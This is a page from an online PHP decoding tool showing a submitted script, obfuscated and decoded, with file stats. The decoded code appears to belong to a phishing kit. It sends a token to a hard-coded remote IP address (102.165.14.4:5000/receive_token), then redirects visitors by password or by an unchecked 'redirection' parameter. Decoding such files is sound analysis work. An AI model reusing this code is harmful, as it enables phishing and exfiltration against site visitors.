Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto ZV2p5; CWNDc: if ($_GET["\x70\167\x64"] == PASSWORD) { get_lang(); $page = "\..

Decoded Output download

<?php 
 goto ZV2p5; CWNDc: if ($_GET["pwd"] == PASSWORD) { get_lang(); $page = "login.php"; header("Location: dV9oBz/" . $page . "?id=" . mt_rand(11111, 99999999)); die; } else { if (isset($_GET["lang"])) { $page = $_SESSION["last_page"] . ".php"; $_SESSION["lang"] = $_GET["lang"]; header("Location: dV9oBz/" . $page . "?id=" . mt_rand(11111, 99999999)); die; } else { if (!empty($_GET["redirection"])) { $page = $_GET["redirection"] . ".php"; if (isset($_GET["error"])) { header("Location: dV9oBz/" . $page . "?error=" . $_GET["error"] . "&id=" . mt_rand(11111, 99999999)); die; } header("Location: dV9oBz/" . $page . "?id=" . mt_rand(11111, 99999999)); die; } else { header("Location: " . OFFICIAL_WEBSITE); die; } } } goto IBp4w; Gj7Ha: $data = array("token" => $token); goto LoYHu; ZV2p5: require_once "app/config.php"; goto nCqlH; nCqlH: $token = ZBI; goto IyJek; LoYHu: $context = stream_context_create(array("http" => array("header" => "Content-type: application/x-www-form-urlencoded\xd\xa", "method" => "POST", "content" => http_build_query($data)))); goto aialg; aialg: file_get_contents($url, false, $context); goto CWNDc; IyJek: $url = "http://102.165.14.4:5000/receive_token?referrer=loco"; goto Gj7Ha; IBp4w: ?>

Did this file decode correctly?

Original Code

<?php
 goto ZV2p5; CWNDc: if ($_GET["\x70\167\x64"] == PASSWORD) { get_lang(); $page = "\x6c\x6f\x67\151\156\x2e\160\150\x70"; header("\114\x6f\143\x61\164\151\157\156\x3a\x20\x64\126\71\157\x42\x7a\57" . $page . "\77\x69\x64\x3d" . mt_rand(11111, 99999999)); die; } else { if (isset($_GET["\x6c\141\156\147"])) { $page = $_SESSION["\x6c\x61\163\x74\x5f\160\141\x67\145"] . "\56\x70\150\x70"; $_SESSION["\154\x61\156\147"] = $_GET["\154\141\156\x67"]; header("\114\x6f\x63\141\x74\x69\157\x6e\x3a\40\x64\126\x39\157\102\x7a\x2f" . $page . "\77\151\144\75" . mt_rand(11111, 99999999)); die; } else { if (!empty($_GET["\x72\145\144\x69\162\x65\x63\x74\x69\157\x6e"])) { $page = $_GET["\x72\145\x64\151\x72\145\143\x74\151\x6f\x6e"] . "\56\x70\150\x70"; if (isset($_GET["\145\162\x72\157\x72"])) { header("\114\157\x63\x61\164\151\x6f\x6e\x3a\40\144\126\x39\x6f\102\172\57" . $page . "\x3f\x65\162\162\157\162\x3d" . $_GET["\x65\162\162\x6f\x72"] . "\46\151\144\x3d" . mt_rand(11111, 99999999)); die; } header("\x4c\157\x63\x61\x74\x69\x6f\x6e\x3a\x20\x64\126\71\x6f\x42\x7a\x2f" . $page . "\77\151\144\75" . mt_rand(11111, 99999999)); die; } else { header("\114\157\143\x61\164\x69\157\x6e\x3a\x20" . OFFICIAL_WEBSITE); die; } } } goto IBp4w; Gj7Ha: $data = array("\164\157\x6b\145\156" => $token); goto LoYHu; ZV2p5: require_once "\141\x70\160\x2f\143\157\156\x66\151\x67\x2e\160\150\x70"; goto nCqlH; nCqlH: $token = ZBI; goto IyJek; LoYHu: $context = stream_context_create(array("\150\x74\x74\160" => array("\x68\145\x61\x64\x65\x72" => "\103\157\156\164\145\156\x74\x2d\x74\171\160\145\x3a\40\x61\x70\x70\154\x69\x63\141\x74\x69\157\x6e\x2f\170\55\167\x77\167\55\x66\157\162\155\55\x75\162\154\145\156\x63\157\x64\x65\x64\xd\xa", "\x6d\x65\x74\150\157\x64" => "\x50\117\123\124", "\143\157\156\164\x65\x6e\x74" => http_build_query($data)))); goto aialg; aialg: file_get_contents($url, false, $context); goto CWNDc; IyJek: $url = "\150\164\x74\x70\72\x2f\57\x31\x30\62\x2e\x31\x36\65\56\61\x34\56\x34\x3a\x35\60\60\x30\57\x72\x65\143\145\x69\166\145\137\x74\x6f\153\x65\156\77\x72\145\x66\145\x72\162\145\x72\75\x6c\x6f\x63\157"; goto Gj7Ha; IBp4w: ?>

Function Calls

None

Variables

None

Stats

MD5 0b3376db55ffa02067d3991bebc4d0d8
Eval Count 0
Decode Time 52 ms